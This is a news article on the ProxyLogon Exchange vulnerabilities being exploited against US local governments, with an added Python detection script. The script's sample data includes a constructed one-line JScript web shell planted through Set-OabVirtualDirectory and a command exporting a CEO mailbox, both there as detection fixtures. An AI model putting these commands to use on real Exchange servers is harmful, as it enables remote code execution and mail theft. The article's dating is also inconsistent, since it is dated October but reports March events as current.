Saturday, October 16, 2021

Microsoft Exchange zero-day exploited in attacks against US local governments


Ongoing investigations into the active exploitation of four Microsoft Exchange bugs have revealed attacks against US local government agencies.

On March 2, Microsoft warned that a set of zero-day vulnerabilities, now tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, was being exploited by attackers in the wild.

Successful exploitation gives an attacker access to on-premises servers running Exchange Server 2013, 2016, and 2019, and to the mailbox data they hold; Exchange Online is not affected. CVE-2021-26855 is a server-side request forgery that lets an unauthenticated attacker send requests as the Exchange server itself, and the other three bugs, chained with it, let the attacker write arbitrary files, including web shells, and run code on the server.

Microsoft has urged customers to apply the released patches immediately, but, as is often the case with zero-day disclosures, attackers have been quick to exploit the bugs before organizations can do so.

According to FireEye's Mandiant Managed Defense team, a wave of attacks targeting organizations in the United States has exploited the Exchange vulnerabilities.

Among the latest victims are local government agencies, an unnamed university, an engineering firm, and a host of vendors in the United States.

This month, one threat actor was seen using at least one of the vulnerabilities to install a web shell on a compromised Exchange server to "establish persistent and secondary access," according to the team. In two cases, the attackers attempted to delete existing administrator accounts on the Exchange servers.

Credential theft, compression of data for exfiltration, and the use of Exchange PowerShell cmdlets to export entire mailboxes were also recorded. The Covenant command-and-control framework, Nishang, and PowerCat were used to maintain remote access.
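Two of the behaviours above leave traces an administrator can hunt for without special tooling: the CVE-2021-26855 request forgery shows up in the Exchange HttpProxy logs as an unauthenticated request whose AnchorMailbox field starts with "ServerInfo~" (the indicator Microsoft's hunting guidance pointed at), and mailbox export or web-shell drops via Set-OabVirtualDirectory show up as recorded cmdlet invocations. The script below is an added example written for this page; it is not code from the article, Mandiant, or Microsoft. The log lines and cmdlet invocations are constructed, the HttpProxy column layout is reduced to the fields the check uses (real logs carry many more columns), and all hostnames and mailbox names are hypothetical.

```python
import csv
import io
import re

# Constructed HttpProxy-style log sample (not a real capture). Real Exchange
# HttpProxy logs live under ...\Exchange Server\V15\Logging\HttpProxy\ and have
# many more columns; only the fields this check needs are kept, in this order.
SAMPLE_HTTPPROXY_LOG = """DateTime,RequestId,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,HttpStatus
2021-03-03T09:12:01.000Z,a1,203.0.113.5,/owa/auth/Current/themes/resources/logon.css,,,200
2021-03-03T09:12:07.000Z,a2,203.0.113.5,/ecp/y.js,,ServerInfo~localhost/autodiscover/autodiscover.xml?#,200
2021-03-03T09:13:44.000Z,a3,198.51.100.20,/owa/,CORP\\jsmith,SMTP:jsmith@corp.example,200
2021-03-03T09:14:02.000Z,a4,203.0.113.5,/ecp/y.js,,ServerInfo~EXCH01.corp.example/ecp/DDI/DDIService.svc/SetObject,200
"""

# Constructed cmdlet invocations of the kind Exchange records in its
# MSExchange Management log (hypothetical hosts, mailboxes and paths).
SAMPLE_CMDLETS = [
    r'Get-MailboxDatabase -Status',
    r'New-MailboxExportRequest -Mailbox ceo@corp.example -FilePath \\EXCH01\c$\inetpub\wwwroot\aspnet_client\ceo.pst',
    r'Set-OabVirtualDirectory -Identity "EXCH01\OAB (Default Web Site)" -ExternalUrl "http://f/<script language=\"JScript\" runat=\"server\">function Page_Load(){eval(Request[\"cmd\"],\"unsafe\");}</script>"',
    r'Get-Mailbox -ResultSize Unlimited',
]

# Cmdlets worth a second look during an Exchange compromise investigation.
SUSPICIOUS_CMDLETS = {
    "New-MailboxExportRequest": "bulk mailbox export (mail theft staging)",
    "Set-OabVirtualDirectory": "OAB ExternalUrl rewritten with script (web shell drop)",
}


def find_proxylogon_requests(log_text):
    """Return HttpProxy rows where an unauthenticated request carried a
    ServerInfo~ AnchorMailbox value, the CVE-2021-26855 SSRF indicator."""
    hits = []
    for row in csv.DictReader(io.StringIO(log_text)):
        unauthenticated = row["AuthenticatedUser"] == ""
        if unauthenticated and row["AnchorMailbox"].startswith("ServerInfo~"):
            hits.append(row)
    return hits


def find_suspicious_cmdlets(cmdlines):
    """Return (cmdlet, reason, line) for recorded cmdlet invocations that match
    the mailbox-export or web-shell-drop patterns. A Set-OabVirtualDirectory
    call is only flagged when its ExternalUrl contains script, so routine URL
    changes by administrators are not reported."""
    flagged = []
    for line in cmdlines:
        if not line.strip():
            continue
        cmdlet = line.split()[0]
        reason = SUSPICIOUS_CMDLETS.get(cmdlet)
        if reason is None:
            continue
        if cmdlet == "Set-OabVirtualDirectory" and not re.search(r"<script|eval\(", line, re.I):
            continue
        flagged.append((cmdlet, reason, line))
    return flagged


if __name__ == "__main__":
    for row in find_proxylogon_requests(SAMPLE_HTTPPROXY_LOG):
        print("SSRF indicator:", row["DateTime"], row["ClientIpAddress"], row["AnchorMailbox"])
    for cmdlet, reason, line in find_suspicious_cmdlets(SAMPLE_CMDLETS):
        print("Suspicious cmdlet:", cmdlet, "-", reason)
        print("   ", line)
```

Run against real data, point the first check at every file in the HttpProxy log directory on each Exchange server and the second at the MSExchange Management event log; a hit from the first check is strong evidence that the server was at least probed, and any hit from the second should be treated as a confirmed compromise until proven otherwise.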

Mandiant added that the compromise of two other organizations, a Southeast Asian government and a Central Asian telecommunications company, may be related to the same campaign.

"The activity we have seen, combined with others in the information security industry, shows that these threat actors are likely using the Exchange Server vulnerabilities to gain access to environments," Mandiant said. "This activity is immediately followed by additional access and persistence processes."

Microsoft has previously attributed the attacks to Hafnium, a Chinese state-sponsored advanced persistent threat (APT) group. The APT has been linked to earlier attacks on US defense firms, law firms, researchers, and think tanks.

Mandiant expects more clusters of intrusions to emerge, a problem that could continue until the vulnerable servers are patched. Kaspersky says there is a high risk of data theft.

Microsoft Exchange users are urged to update their software as soon as possible, and to check their servers for signs of compromise, since patching closes the vulnerabilities but does not remove web shells or accounts an attacker has already planted.

In related news this week, the Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive instructing federal civilian agencies to respond immediately to the Microsoft Exchange vulnerabilities.

Priyanshu Vijayvargiya
Founder and Editor-in-Chief of 'Virtualattacks Inc', Priyanshu Vijayvargiya is a cybersecurity analyst, information security professional, developer, and white hat hacker.

